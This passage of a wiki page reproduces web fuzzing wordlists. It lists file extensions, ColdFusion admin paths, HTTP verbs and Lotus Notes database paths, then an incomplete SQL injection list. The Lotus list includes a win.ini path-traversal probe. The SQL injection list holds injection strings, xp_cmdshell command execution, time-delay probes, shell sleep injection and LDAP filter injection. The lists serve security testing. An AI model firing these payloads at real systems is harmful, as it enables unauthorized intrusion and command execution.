#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
